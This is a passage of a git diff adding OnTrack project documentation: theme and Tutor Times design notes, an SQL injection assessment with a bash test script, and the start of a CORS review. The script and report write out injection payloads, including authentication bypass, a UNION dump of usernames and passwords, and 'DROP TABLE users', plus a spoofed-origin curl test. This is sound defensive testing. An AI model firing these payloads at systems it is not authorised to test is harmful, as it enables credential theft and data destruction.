(ie dropdown menu items move other elements down) +selecting outside of these options closes the drop box without making change +selecting one of these options binds the option in /edit_profile + +### Theme selection state management + +Selected theme should be stored in application state to allow selected theme to be applied across the application + +Implementation: Need tech review + +Acceptance Criteria: +WIP - list all places where colours would be expected to be updated ie burndown graph, colour coded statuses etc + +### Dynamic theme CSS + +Define separate css files for each theme to encapsulate theme-specific colours + +Implementation - REQUIRES TECH REVIEW +consider moving src/styles/* into /styles/themes/ +File Structure +src/styles/themes/default/_default-theme.scss + +src/styles/themes/dueteranopia/_deuteranopia-theme.scss +src/styles/themes/protanopia/_protanopia-theme.scss +src/styles/themes/tritanopia/_tritanopia-theme.scss + +consider moving /src/app/visualisations/* to /src/app/visualisations/themes/ + +/src/app/visualisations/progress-burndown-chart.coffee can be overwritten with + +/src/app/visualisations/progress-burndown-chart_deuteranopia.coffee +/src/app/visualisations/progress-burndown-chart_protanopia.coffee +/src/app/visualisations/progress-burndown-chart_tritanopia.coffee +--- + +### Dynamic theme CSS 2.0: Integration + +Global style integration - Import selected themes SCSS file into the main styles.scss to apply theme globally + +### Theme switching service + +Develop a service (eg ThemeService) to handle theme switch logic. + +Implementation: +Method: The service should dynamically load the apppropriate theme SCSS / COFFEE file based on users theme preference +Injection: This service should be injected into main app component to apply theme on initialization +Acceptance Criteria: +work in progress + +### BACKEND: User model update + +add field theme_preference to user model to store selected theme + +Implementation: +Migration: create and run db migration to add field to user model +Validations: fields should only accept predefined theme values + +### BACKEND: API endpoint modification + +User profile API endpoints should handle theme_preference field from user model + +Implementation: +GET: retrieve users current theme preference +PUT/PATCH: update users theme preference +VALIDATIONS: only valid theme values should be accepted + +### BACKEND: Database Migration + +write script for db migration to add theme_preference to user table +e.g. #this is pseudo code. don't really use a string!!! ideally this is an enum# + +class AddThemePreferenceToUsers < ActiveRecord::Migration[6.1] +def change +add_column :users, :theme_preference, :string, default: 'default' +add_index :users, :theme_preference +end +end + +### OPTIONAL: Integration test + +Develop integration test to verify theme selection persists across sessions and is correctly injected on application initialization + +### OPTIONAL: Unit test + +unit tests for functionality +write test for ThemeService to ensure themes are being correctly applied +write test for edit-profile-form.component to verify options are displayed correctly + +### DOC: Dev documentation + +once tech review completed document +structure of theme scss files, +coffee files, +purpose of ThemeService, +style guidelines, +API endpoint information diff --git a/src/content/docs/frontend/tutor-times/tutor-times-design.md b/src/content/docs/frontend/tutor-times/tutor-times-design.md new file mode 100644 index 00000000..971adf91 --- /dev/null +++ b/src/content/docs/frontend/tutor-times/tutor-times-design.md @@ -0,0 +1,154 @@ +--- +title: Tutor-Times Design +--- + +## 1. Introduction + +### 1.1 Purpose +This document outlines the design of the frontend for the "Tutor Times" feature in OnTrack (formerly known as Doubtfire). The purpose is to provide an intuitive and user-friendly interface for tutors to track and manage the time spent on providing feedback to students. + +### 1.2 Scope +The scope of this design document covers the user interface (UI) and user experience (UX) aspects of the "Tutor Times" feature within the OnTrack Learning Management System. This feature will enhance model by enabling tutors to monitor their time management efficiently. + +### 1.3 Intended Audience +This document is intended for frontend developers, designers, and stakeholders involved in the implementation of the "Tutor Times" feature. + +## 2. User Interface (UI) Design + +### 2.1 Overview +The "Tutor Times" feature will seamlessly integrate into the existing OnTrack UI, maintaining a cohesive visual identity and navigation structure. + +### 2.2 Wireframes and Mockups + +#### 2.2.1 Time Dashboard for Tutors + +![Tutor-Progress](../../../../../public/tutor-progress.png) +![Filter-By-Units](../../../../../public/units-filteration.png) + +The dashboard provides an overview of marking time statistics, including total time spent on a task and time spent per student. + +#### 2.2.2 Time Stats for Admin + +![Admin-Stats](../../../../../public/admin-stats.png) + +The page displays a list of tutors and their respective marking times for each unit. + +### 2.3 Responsive Design +The UI will be responsive to ensure a consistent user experience across various devices, including desktops, tablets, and mobile phones. + +### 2.4 Colour Scheme +- **Primary Colour**: OnTrack primary colour +- **Secondary Colour**: OnTrack secondary colour +- **Text Colour**: OnTrack text colours + +### 2.5 Typography +- **Headings**: OnTrack head text font (Bold) +- **Body Text**: OnTrack body text font (Regular) +- **Buttons**: OnTrack button text (Semi-Bold) + +### 2.6 Icons +Standard icons will be used for actions such as starting and stopping timers, along with custom icons for notifications. + +### 2.7 Navigation +The "Marking Time" feature will be accessible through the main navigation menu within OnTrack. Clear breadcrumbs will guide users through the application. + +### 2.8 Notifications +Notifications will be displayed at the top of the dashboard, providing real-time feedback on marking progress and milestones. + +### 2.9 User Profiles +Tutors will have access to their profiles to view personal information and settings. + +## 3. User Experience (UX) Design + +### 3.1 User Flows + +#### 3.1.1 Checking Dashboard for Session Updates +1. **Tutor logs into OnTrack** and directed to their personalized dashboard from tutor times option, +2. Tutors can **view session summaries** and their **total time spent** on marking tasks across units on the dashboard. +3. The **Activity Log** on the dashboard will display logged activities, such as "assessing", "inbox", or "completed", with timestamps. +4. Tutors can see aggregated **session data** for each unit and task to track their progress in real time. + +### 3.2 Interactive Features + +#### 3.2.1 Real-Time Session Updates +- The frontend will display real-time updates of the tutor's session status (e.g., active, paused, completed) based on backend data. + +#### 3.2.2 Activity Log +- Tutors will have an activity log that records actions such as "Assessing", "In Progress", and "Completed" for each marking task. +- The activity log will be updated in real-time based on the API calls made to the backend. + +#### 3.2.3 Data Aggregation Dashboard +- Tutors will be able to view an aggregated summary of their total marking time across units and tasks. +- The dashboard will show visual elements like progress bars, pie charts, or line graphs summarizing their session data. + +## 4. Interactive Features + +### 4.1 Visualisation Dashboard (`ngx-graph`) +- Tutors will see a graph-based layout (using [ngx-graph](https://swimlane.github.io/ngx-graph/) and [ngx-chart](https://github.com/swimlane/ngx-charts)) of marking time broken down by: + - Units + - Tasks + - Time per student + +### 4.2 Admin Visibility +- Admins can view marking time statistics for all tutors. +- Admins can filter by: + - Tutor + - Unit + +### 4.3 Notification System +- Real-time notifications will alert tutors of milestones and progress, enhancing user engagement. These notifications will be displayed in a dedicated section, ensuring tutors are notified of important time milestones or completion of tasks. + +## 5. Performance Considerations + +### 5.1 Page Load Times +Efforts will be made to optimize page load times to ensure a seamless user experience. + +### 5.2 Caching +Caching mechanisms will be implemented to reduce load times and improve overall performance. + +## 6. Compatibility + +### 6.1 Browser Compatibility +- Supported browsers: Chrome, Firefox, Safari, Edge +- Cross-browser compatibility will be ensured. + +### 6.2 Device Compatibility +Responsive design will ensure compatibility with various devices, including desktops, tablets, and mobile phones. + +## 7. Security + +### 7.1 Data Security +- User data will be securely stored and protected against unauthorized access. + +### 7.2 HTTPS +- HTTPS will be enforced to secure data transmission between the frontend and backend. + +## 8. Version Control and Collaboration + +### 8.1 Version Control +- Git will be used for version control, following a branching strategy for collaborative development. + +### 8.2 Collaboration Tools +- Tools like MsTeams and project management software will facilitate communication among team members. + +## 9. Testing Plan + +### 9.1 Unit Testing +- Unit tests will be developed for frontend components, including timers, input forms, and notifications. + +### 9.2 User Acceptance Testing +- User acceptance testing (UAT) will ensure that the "Tutor Times" feature meets user requirements and expectations. + +## 10. Deployment Plan + +### 10.1 Deployment Environment +- The feature will be deployed to the OnTrack production environment. + +### 10.2 Deployment Process +- A systematic deployment process will be followed to release frontend updates to the live environment. + +## 11. Conclusion +This design document provides a comprehensive plan for the frontend implementation of the "Tutor Times" feature in OnTrack. It outlines the UI/UX design, interactive features, performance considerations, compatibility, security measures, and testing strategies. This design will enhance the learning experience for tutors and students, promoting efficient time management and feedback delivery. + +## 12. Appendices +- Once the feature is implemented, a link will be provided to the frontend repository. diff --git a/src/content/docs/frontend/tutor-times/tutor-times-requirements.md b/src/content/docs/frontend/tutor-times/tutor-times-requirements.md new file mode 100644 index 00000000..2e4f7cd0 --- /dev/null +++ b/src/content/docs/frontend/tutor-times/tutor-times-requirements.md @@ -0,0 +1,118 @@ +--- +title: Tutor-Times Frontend Requirements +--- + +## Project Overview + +## Table of Contents + +- [1. Introduction](#1-introduction) + - [1.1 Purpose](#11-purpose) + - [1.2 Scope](#12-scope) + - [1.3 Intended Audience](#13-intended-audience) +- [2. Functional Requirements](#2-functional-requirements) + - [2.1 Tutor Session View](#21-tutor-session-view) + - [2.2 Admin Analytics Dashboard](#22-admin-analytics-dashboard) + - [2.3 API Integration](#23-api-integration) + - [2.4 UI Requirements](#24-ui-requirements) +- [3. Non-Functional Requirements](#3-non-functional-requirements) + - [3.1 Performance](#31-performance) + - [3.2 Usability](#32-usability) + - [3.3 Compatibility](#33-compatibility) + - [3.4 Security](#34-security) +- [4. User Stories](#4-user-stories) + - [4.1 User Story 1](#41-user-story-1) + - [4.2 User Story 2](#42-user-story-2) +- [5. Testing Requirements](#5-testing-requirements) + - [5.1 Component Testing](#51-component-testing) + - [5.2 Access Control Testing](#52-access-control-testing) + - [5.3 API Integration Testing](#53-api-integration-testing) + +--- + +## 1. Introduction + +### 1.1 Purpose + +The purpose of this document is to outline the frontend requirements for the **"Tutor Times"** feature. This feature will allow tutors and admins to access marking session data, monitor progress, and generate reports via the frontend interface. + +### 1.2 Scope + +This document covers the functional and non-functional requirements for the frontend design, including interaction with the backend API for data retrieval. It focuses on the tutor session view and admin analytics dashboard. + +### 1.3 Intended Audience + +This document is intended for frontend developers, designers, and stakeholders responsible for implementing and reviewing the **"Tutor Times"** frontend feature. + +--- + +## 2. Functional Requirements + +### 2.1 Tutor Session View +- Display a list of recent marking sessions for the logged-in tutor. +- Show: + - Session start and end times + - Duration of each session + - Associated unit and project + +### 2.2 Admin Analytics Dashboard +- Allow admins to: + - View marking sessions of all tutors + - Filter sessions by tutor, unit, project, or date range + - See aggregate marking time statistics + +### 2.3 API Integration +- Integrate with existing backend APIs to retrieve session data for tutors and admins. +- API endpoints must be called securely and reliably to fetch marking time records. +- Ensure data is displayed in real-time or as close to real-time as possible. + +### 2.4 UI Requirements +- Create a user-friendly, intuitive interface for both the Tutor Session View and Admin Analytics Dashboard. +- Design responsive layouts to ensure functionality on different screen sizes (desktop, tablet, mobile). +- Use charts, tables, and filters to present data clearly. +- Include pagination and sorting features where applicable. + +--- + +## 3. Non-Functional Requirements + + +### 3.1 Usability +- The user interface should be easy to use and visually clear for both tutors and admins. +- Ensure accessibility and user-friendly design for diverse audiences. + +### 3.2 Compatibility +- Ensure compatibility with modern web browsers such as Chrome, Firefox, Safari, and Edge. +- Make sure the frontend is fully functional across desktop and mobile browsers. + +--- + +## 4. User Stories + +### 4.1 User Story 1 + +**As a tutor, I want to view a list of my marking sessions, so I can track the time spent on each task and unit.** + +- Tutors should be able to view their marking session details, including start/end times and total duration, for each task and unit. + +### 4.2 User Story 2 + +**As an admin, I want to access data from all tutors’ marking sessions, so I can generate aggregate reports and analyze workload.** + +- Admins should be able to view marking sessions for all tutors, filter by unit, task, and time, and view aggregated statistics. + +--- + +## 5. Testing Requirements + +### 5.1 Component Testing +- Verify the correct rendering of session data, including the start/end time, duration, and associated unit/project. +- Test interactive elements like filters and pagination for functionality. + +### 5.2 Access Control Testing +- Test that tutors can only see their own session data and not access other tutors' data. +- Admins should be able to access data for all tutors, but only if they have the necessary permissions. + +### 5.3 API Integration Testing +- Ensure that the frontend correctly fetches and displays data from the backend API. +- Test that the frontend handles potential errors (e.g., server downtime, data loading issues) gracefully. diff --git a/src/content/docs/index.mdx b/src/content/docs/index.mdx index a2376eb9..002e5c13 100644 --- a/src/content/docs/index.mdx +++ b/src/content/docs/index.mdx @@ -5,7 +5,7 @@ template: splash hero: tagline: Centralised location for OnTrack project documentation! image: - file: ../../assets/ontrack.webp + file: ../../assets/logo.svg --- import { Card, CardGrid, LinkCard } from '@astrojs/starlight/components'; diff --git a/src/content/docs/injectiontest/sql-injection-report.md b/src/content/docs/injectiontest/sql-injection-report.md new file mode 100644 index 00000000..3b7549b8 --- /dev/null +++ b/src/content/docs/injectiontest/sql-injection-report.md @@ -0,0 +1,191 @@ +# SQL Injection Vulnerability Assessment + +## 1. Introduction + +SQL Injection is a code injection technique that exploits vulnerabilities in applications that interact with databases. It occurs when untrusted data is sent to an interpreter as part of a command or query, allowing attackers to manipulate databases by inserting malicious SQL statements. + +### Examples of SQL Injection + +**Basic Authentication Bypass:** +```sql +-- Original intended query +SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password' + +-- With SQL injection input: ' OR '1'='1 +SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'password' +``` + +This injection makes the WHERE clause always evaluate to true, potentially granting access without valid credentials. + +**Data Extraction:** +```sql +-- With SQL injection input: admin' UNION SELECT username, password FROM users-- +SELECT * FROM users WHERE username = 'admin' UNION SELECT username, password FROM users--' AND password = 'password' +``` + +This injection attempts to retrieve all usernames and passwords from the database. + +**Destructive Operations:** +```sql +-- With SQL injection input: '; DROP TABLE users;-- +SELECT * FROM users WHERE username = ''; DROP TABLE users;--' AND password = 'password' +``` + +This injection attempts to delete the entire users table. + +## 2. Test Cases + +The following test cases were executed to assess the application's resistance to SQL injection attacks: + +1. **Authentication Bypass Tests:** + - Testing `' OR '1'='1` in username and password fields + - Testing `admin' --` to comment out password verification + +2. **Data Extraction Tests:** + - Testing `' UNION SELECT username, password FROM users --` to retrieve sensitive data + +3. **Destructive Operation Tests:** + - Testing `' OR '1'='1'; DROP TABLE users; --` to attempt database destruction + +4. **Other Common Patterns:** + - Testing `admin'; SELECT * FROM users; --` to execute additional queries + +5. **Baseline Verification:** + - Testing legitimate credentials to verify normal functionality + +## 3. Methodology + +### Prerequisites + +To execute the tests, you will need: + +1. A running instance of the Doubtfire application (both API and web client) +2. Basic understanding of bash scripting +3. cURL installed on your system +4. (Optional) Nikto web vulnerability scanner + +### Test Execution + +1. **Clone the repository:** + ```bash + git clone https://github.com/thoth-tech/doubtfire-astro.git + cd doubtfire-astro + ``` + +2. **Navigate to the security test scripts directory:** + ```bash + cd docs/src/content/security/scripts + ``` + +3. **Make the script executable:** + ```bash + chmod +x test-sql-injection.sh + ``` + +4. **Review and configure the script if needed:** + The script is pre-configured with the following settings: + - API URL: http://localhost:3000 + - Client URL: http://localhost:4200 + - Admin credentials: username "aadmin", password "password" + - Student credentials: username "student_1", password "password" + + Modify these values in the script if your environment differs. + +5. **Run the script:** + ```bash + ./test-sql-injection.sh + ``` + +6. **Interpret the results:** + - Green checkmarks (✓) indicate successful blocks of injection attempts + - Red X marks (✗) indicate potential vulnerabilities + - Yellow question marks (?) indicate inconclusive tests + + The script will provide a summary at the end with counts of passed, failed, and inconclusive tests. + + > **Important:** The script may show "Valid login failed" in the test summary even when your authentication system is working correctly. This occurs because the script expects a specific response format (200 status code with an auth_token in the response), while your API might use a different format (e.g., 201 status code with user data). This limitation does not affect the SQL injection test results. + +### Understanding Results + +The script tests each SQL injection payload against both username and password fields, checking: + +1. **Response status codes:** 401, 403, or 400 status codes typically indicate proper validation +2. **Response content:** Error messages that indicate input validation but don't expose database details +3. **Normal functionality:** Verification that legitimate credentials still work as expected + +If Nikto is installed, it will also perform a broader vulnerability scan of the application. + +## 4. Test Results + +### Authentication Endpoint Tests + +When executing the script against our test environment, we observed the following results: + +#### Username Field Tests: +- All injection attempts were blocked with 401 status codes +- Error messages were properly sanitized without revealing database details +- 6/6 tests passed, 0 failed, 0 inconclusive + +#### Password Field Tests: +- All injection attempts were blocked with 401 status codes +- Error messages were properly sanitized without revealing database details +- 6/6 tests passed, 0 failed, 0 inconclusive + +#### Baseline Functionality: +- Valid credentials test shows as "failed" in script output, but this is only because the script expects a 200 status code and specific response format +- The application actually returns a 201 status code with valid user data, indicating the authentication system is working correctly +- This script limitation doesn't affect the SQL injection test results + +#### Security Scan: +- Nikto scan completed without detecting SQL injection vulnerabilities +- Some minor HTTP header recommendations were identified (X-Frame-Options, Content-Type-Options) + +### Overall Assessment + +The application demonstrated strong resistance to SQL injection attacks at the authentication endpoints. All common SQL injection patterns were properly identified and blocked with appropriate status codes and error handling. + +> **Note:** Although the script reports "Valid login failed" in the test summary, this is due to a technical limitation in the script's validation logic (expecting a 200 status code and specific response format), not an actual issue with the application's authentication mechanism. The application correctly returns user data with a 201 status code when valid credentials are provided. + +## 5. Actions Required + +Based on our findings, the following actions are recommended: + +1. **Documentation Update:** + - Add SQL injection prevention techniques to the developer documentation + - Create training material for new developers on secure coding practices + +2. **Security Headers Implementation:** + - Implement X-Frame-Options header to prevent clickjacking attacks + - Add X-Content-Type-Options header to prevent MIME type sniffing + +3. **Regular Security Testing:** + - Implement automated SQL injection testing as part of the CI/CD pipeline + - Schedule quarterly security audits with broader scope + +4. **Input Validation Review:** + - Review other data entry points in the application for similar protection + - Consider implementing a central input validation service + +5. **Error Handling Enhancement:** + - Review error messages across the application to ensure they don't leak sensitive information + - Implement consistent error handling patterns across all endpoints + +6. **Script Improvements Implemented:** + - Changed all hardcoded URLs to use the variables defined at the top of the script + - Updated curl commands to use `$TARGET_URL` instead of hardcoded URLs + - Made sure all references to URLs use the variables + - Added command-line options for easier customization: + - Added a `-a` option to set the API URL + - Added a `-c` option to set the client URL + - Added a `-u` option to set the student username + - Added a `-p` option to set the student password + - Added a `-h` option to show help + - Added auto-detection of API URLs from project configuration files + - Added support for configuration through an external file + - Improved error handling and reporting + +These actions will further strengthen the application's security posture and ensure that SQL injection vulnerabilities remain properly mitigated. + +## Attachments + +- [test-sql-injection.sh](./test-sql-injection.sh) - Automated SQL injection testing script diff --git a/src/content/docs/injectiontest/test-sql-injection.sh b/src/content/docs/injectiontest/test-sql-injection.sh new file mode 100644 index 00000000..7f546f57 --- /dev/null +++ b/src/content/docs/injectiontest/test-sql-injection.sh @@ -0,0 +1,288 @@ +#!/bin/bash +# Improved SQL Injection Security Test Script +# This script tests the application's resistance to SQL injection attacks + +# Load configuration from config file if it exists +CONFIG_FILE="./sql_injection_config.sh" +if [ -f "$CONFIG_FILE" ]; then + # Source the config file to get custom configuration + source "$CONFIG_FILE" + printf "Loaded configuration from $CONFIG_FILE\n" +fi + +# Set variables with config file values or defaults +API_URL="${API_URL:-http://localhost:3000}" +CLIENT_URL="${CLIENT_URL:-http://localhost:4200}" +USERNAME_FIELD="${USERNAME_FIELD:-username}" +PASSWORD_FIELD="${PASSWORD_FIELD:-password}" +STUDENT_USERNAME="${STUDENT_USERNAME:-student_1}" +STUDENT_PASSWORD="${STUDENT_PASSWORD:-password}" +ADMIN_USERNAME="${ADMIN_USERNAME:-aadmin}" +ADMIN_PASSWORD="${ADMIN_PASSWORD:-password}" + +# Derive dependent URLs +CLIENT_LOGIN_PAGE="${CLIENT_URL}/#/sign_in" +TARGET_URL="${API_URL}/api/auth" +NIKTO_TARGET="$API_URL" + +# Script usage function +show_usage() { + printf "Usage: $0 [options]\n" + printf "Options:\n" + printf " -a URL Set API URL (default: http://localhost:3000)\n" + printf " -c URL Set client URL (default: http://localhost:4200)\n" + printf " -u USER Set student username for testing (default: student_1)\n" + printf " -p PASS Set student password for testing (default: password)\n" + printf " -h Show this help message\n" + printf "\nYou can also create a config file named 'sql_injection_config.sh' with values for API_URL, CLIENT_URL, etc.\n" + exit 1 +} + +# Parse command line options (these override both defaults and config file) +while getopts "a:c:u:p:h" opt; do + case ${opt} in + a ) + API_URL=$OPTARG + NIKTO_TARGET=$OPTARG + TARGET_URL="${API_URL}/api/auth" + ;; + c ) + CLIENT_URL=$OPTARG + CLIENT_LOGIN_PAGE="${CLIENT_URL}/#/sign_in" + ;; + u ) + STUDENT_USERNAME=$OPTARG + ;; + p ) + STUDENT_PASSWORD=$OPTARG + ;; + h ) + show_usage + ;; + \? ) + show_usage + ;; + esac +done + +# Display configuration +printf "Using configuration:\n" +printf " API URL: $API_URL\n" +printf " Client URL: $CLIENT_URL\n" +printf " Target endpoint: $TARGET_URL\n" + +# Colors for output - we'll use these without echo -e to avoid the -e in output +GREEN='\033[0;32m' +RED='\033[0;31m' +BLUE='\033[0;34m' +YELLOW='\033[0;33m' +NC='\033[0m' # No Color + +# SQL injection payloads to test +declare -a PAYLOADS=( + "' OR '1'='1" + "admin' --" + "' OR 1=1 --" + "' UNION SELECT username, password FROM users --" + "' OR '1'='1'; DROP TABLE users; --" + "admin'; SELECT * FROM users; --" +) + +printf "${BLUE}===== SQL Injection Security Test =====${NC}\n" +printf "${BLUE}This test will verify that the application is protected against SQL injection attacks.${NC}\n" +printf "${BLUE}Testing API endpoint: ${TARGET_URL} (Client login page: ${CLIENT_LOGIN_PAGE})${NC}\n" +printf "${BLUE}Expected result: All injection attempts should be blocked.${NC}\n\n" + +# Verify legitimate credentials first +printf "\n${BLUE}===== Verifying Legitimate Credentials =====${NC}\n" +printf "${BLUE}Testing valid login with student credentials${NC}\n" + +# Add timeout and hardcode the URL to avoid parsing issues +VALID_LOGIN_RESULT=$(curl -s --connect-timeout 10 -X POST "$TARGET_URL" \ + -H "Content-Type: application/json" \ + -d "{\"username\":\"$STUDENT_USERNAME\", \"password\":\"$STUDENT_PASSWORD\"}" \ + -w "\n%{http_code}" 2>&1) + +VALID_LOGIN_STATUS=$(echo "$VALID_LOGIN_RESULT" | tail -n1) +VALID_LOGIN_BODY=$(echo "$VALID_LOGIN_RESULT" | sed '$d') + +printf "${BLUE}Connection details:${NC}\n" +echo "$VALID_LOGIN_RESULT" | grep -E "Connected to|Connection refused|Failed to connect" || echo "No connection details found" + +if [[ "$VALID_LOGIN_STATUS" == "200" || "$VALID_LOGIN_STATUS" == "201" ]] && [[ "$VALID_LOGIN_BODY" == *"auth_token"* || "$VALID_LOGIN_BODY" == *"user"* ]]; then + printf "${GREEN}✓ Valid credentials work correctly${NC}\n" + if [[ "$VALID_LOGIN_BODY" == *"auth_token"* ]]; then + printf "${GREEN} Received authentication token.${NC}\n" + elif [[ "$VALID_LOGIN_BODY" == *"user"* ]]; then + printf "${GREEN} Received user data.${NC}\n" + fi + VALID_LOGIN_TEST="PASSED" +else + printf "${RED}✗ Valid credentials test failed. Check if the API is running correctly.${NC}\n" + printf "${YELLOW} Status: $VALID_LOGIN_STATUS${NC}\n" + printf "${YELLOW} Response snippet: ${VALID_LOGIN_BODY:0:100}${NC}\n" + printf "${YELLOW} Try manually checking if the API is running with: curl $TARGET_URL${NC}\n" + VALID_LOGIN_TEST="FAILED" + printf "${YELLOW}WARNING: The SQL injection tests may not be reliable if valid login doesn't work.${NC}\n" + + # Ask if user wants to continue despite the failed credentials test + printf "${BLUE}Do you want to continue with SQL injection tests anyway? (y/n)${NC}\n" + read -r continue_choice + if [[ ! "$continue_choice" =~ ^[Yy]$ ]]; then + printf "${BLUE}Test aborted. Please ensure the API is running and try again.${NC}\n" + exit 1 + fi +fi + +printf "${BLUE}----------------------------------------${NC}\n\n" + +# Function to test a single payload +test_payload() { + local payload=$1 + local field=$2 + local endpoint=$3 + + printf "${BLUE}Testing payload: ${payload} in ${field} field${NC}\n" + + local response + if [ "$field" == "$USERNAME_FIELD" ]; then + response=$(curl -s --connect-timeout 5 -X POST "$endpoint" \ + -H "Content-Type: application/json" \ + -d "{\"$USERNAME_FIELD\":\"${payload}\", \"$PASSWORD_FIELD\":\"$STUDENT_PASSWORD\"}" \ + -w "\n%{http_code}" 2>&1) + else + response=$(curl -s --connect-timeout 5 -X POST "$endpoint" \ + -H "Content-Type: application/json" \ + -d "{\"$USERNAME_FIELD\":\"$STUDENT_USERNAME\", \"$PASSWORD_FIELD\":\"${payload}\"}" \ + -w "\n%{http_code}" 2>&1) + fi + + local status_code=$(echo "$response" | tail -n1) + local body=$(echo "$response" | sed '$d') + + printf "${BLUE}Status code: ${status_code}${NC}\n" + + if [[ "$status_code" == "200" && "$body" == *"success"* || "$body" == *"token"* || "$body" == *"welcome"* ]]; then + printf "${RED}✗ VULNERABILITY DETECTED: Injection may have succeeded!${NC}\n" + printf "${RED} Response indicates successful login or data retrieval.${NC}\n" + return 1 + elif [[ "$body" == *"error"* || "$body" == *"invalid"* || "$body" == *"sql"* || "$body" == *"syntax"* ]]; then + printf "${GREEN}✓ Injection blocked: Error message detected${NC}\n" + return 0 + elif [[ "$status_code" == "400" || "$status_code" == "401" || "$status_code" == "403" || "$status_code" == "422" ]]; then + printf "${GREEN}✓ Injection blocked: Appropriate error status code returned${NC}\n" + return 0 + else + printf "${YELLOW}? Inconclusive: Unexpected response${NC}\n" + printf "${YELLOW} Response body: ${body}${NC}\n" + return 2 + fi +} + +# Test username field +printf "\n${BLUE}===== Testing Username Field =====${NC}\n" +username_passed=0 +username_failed=0 +username_inconclusive=0 + +for payload in "${PAYLOADS[@]}"; do + test_payload "$payload" "$USERNAME_FIELD" "$TARGET_URL" + test_result=$? + + if [ $test_result -eq 0 ]; then + ((username_passed++)) + elif [ $test_result -eq 1 ]; then + ((username_failed++)) + else + ((username_inconclusive++)) + fi + + printf "${BLUE}----------------------------------------${NC}\n\n" +done + +# Test password field +printf "\n${BLUE}===== Testing Password Field =====${NC}\n" +password_passed=0 +password_failed=0 +password_inconclusive=0 + +for payload in "${PAYLOADS[@]}"; do + test_payload "$payload" "$PASSWORD_FIELD" "$TARGET_URL" + test_result=$? + + if [ $test_result -eq 0 ]; then + ((password_passed++)) + elif [ $test_result -eq 1 ]; then + ((password_failed++)) + else + ((password_inconclusive++)) + fi + + printf "${BLUE}----------------------------------------${NC}\n\n" +done + +printf "\n${BLUE}===== Running Nikto Scan for Input Validation Issues =====${NC}\n" +printf "${BLUE}This may take a few minutes...${NC}\n" +if command -v nikto &> /dev/null; then + printf "${BLUE}Starting Nikto scan...${NC}\n" + nikto -host "$NIKTO_TARGET" -Format txt -output nikto_scan_output.txt + printf "${GREEN}Nikto scan complete. Results saved to 'nikto_scan_output.txt'${NC}\n" + + # Check for SQL injection vulnerabilities in Nikto output + if grep -q "SQL Injection" nikto_scan_output.txt; then + printf "${RED}⚠️ Nikto found potential SQL Injection vulnerabilities!${NC}\n" + printf "${RED}Please review the full report in nikto_scan_output.txt${NC}\n" + nikto_sql_detected=true + else + printf "${GREEN}✓ No SQL Injection vulnerabilities detected by Nikto${NC}\n" + nikto_sql_detected=false + fi +else + printf "${YELLOW}Nikto not installed. Skipping automated vulnerability scan.${NC}\n" + printf "${YELLOW}Install Nikto with: sudo apt-get install nikto (Debian/Ubuntu)${NC}\n" + nikto_sql_detected=false +fi + +# Summarize results +printf "\n${BLUE}===== Test Summary =====${NC}\n" +printf "${BLUE}Username field tests:${NC}\n" +printf " ${GREEN}✓ Passed: $username_passed${NC}\n" +printf " ${RED}✗ Failed: $username_failed${NC}\n" +printf " ${YELLOW}? Inconclusive: $username_inconclusive${NC}\n" + +printf "\n${BLUE}Password field tests:${NC}\n" +printf " ${GREEN}✓ Passed: $password_passed${NC}\n" +printf " ${RED}✗ Failed: $password_failed${NC}\n" +printf " ${YELLOW}? Inconclusive: $password_inconclusive${NC}\n" + +printf "\n${BLUE}Nikto scan:${NC}\n" +if [ "$nikto_sql_detected" = true ]; then + printf " ${RED}✗ SQL vulnerabilities detected${NC}\n" +else + printf " ${GREEN}✓ No SQL vulnerabilities detected${NC}\n" +fi + +printf "\n${BLUE}Valid credentials test:${NC}\n" +if [ "$VALID_LOGIN_TEST" = "PASSED" ]; then + printf " ${GREEN}✓ Valid login works${NC}\n" +else + printf " ${RED}✗ Valid login failed${NC}\n" +fi + +# Final assessment +TOTAL_FAILED=$((username_failed + password_failed)) +NIKTO_FAILED=$([[ "$nikto_sql_detected" = true ]] && echo 1 || echo 0) + +if [[ $TOTAL_FAILED -eq 0 && $NIKTO_FAILED -eq 0 ]]; then + printf "\n${GREEN}SUCCESS: Your application appears to be protected against SQL injection attacks.${NC}\n" + printf "${GREEN}✓ All manual injection tests passed${NC}\n" + printf "${GREEN}✓ No SQL injection vulnerabilities detected by Nikto${NC}\n" +elif [[ $TOTAL_FAILED -eq 0 && $NIKTO_FAILED -eq 1 ]]; then + printf "\n${YELLOW}PARTIAL SUCCESS: Manual tests passed but Nikto found potential issues.${NC}\n" + printf "${YELLOW}Please review the Nikto report for details.${NC}\n" +else + printf "\n${RED}VULNERABILITY DETECTED: Your application may be vulnerable to SQL injection!${NC}\n" + printf "${RED}Please review failed tests and fix the identified vulnerabilities.${NC}\n" +fi + +exit 0 diff --git a/src/content/docs/security/CORS_findings.md b/src/content/docs/security/CORS_findings.md new file mode 100644 index 00000000..af65607e --- /dev/null +++ b/src/content/docs/security/CORS_findings.md @@ -0,0 +1,143 @@ +--- +title: CORS Security Assessment Report +--- + +### Introduction + +This document provides a detailed assessment of the Cross-Origin Resource Sharing (CORS) configuration for the OnTrack web application. It investigates a previously reported CORS vulnerability affecting a development instance and verifies whether the same misconfiguration exists in the current production environment. + +**Target Application:** OnTrack Web Application +**Tested URL:** https://ontrack.deakin.edu.au +**Date of Testing:** 19 May 2025 +**Assessor:** Ibitope Fatoki + +--- + +### Background + +A prior penetration test report identified a CORS misconfiguration on the OnTrack web application running on a development server (`http://172.18.0.1:4200`). That instance responded with: + +``` +Access-Control-Allow-Origin: * +``` + +Such a configuration enables any external website to send authenticated requests to the API endpoints, potentially resulting in unauthorized access if sessions or tokens are leaked or guessed. + +Given the critical nature of such a vulnerability, we aimed to verify whether this misconfiguration persists in the production version of the application accessible at `https://ontrack.deakin.edu.au`. + +--- + +### Methodology + +#### Tool Used + +- **Command Line Utility:** `curl.exe` on Windows (to bypass PowerShell’s alias for curl) + +#### Test 1 – Baseline Header Inspection + +- **Command:** + `curl.exe -I https://ontrack.deakin.edu.au` +- **Purpose:** + Inspect default HTTP response headers and verify whether CORS headers are exposed by default. + +#### Test 2 – Simulated Malicious Origin Request + +- **Command:** + `curl.exe -H "Origin: https://evil.com" -I https://ontrack.deakin.edu.au` +- **Purpose:** + Simulate a cross-origin request and observe whether the server reflects the Origin header via `Access-Control-Allow-Origin`. + +#### Proof of Testing + +![Screenshot of CORS header tests using curl.exe in Windows PowerShell](./Images/CORS.png) +*Figure: Output of CORS header tests showing no unsafe headers present in either default or custom Origin requests.* + +--- + +### Findings + +#### 4.1 Response to Baseline Header Request + +``` 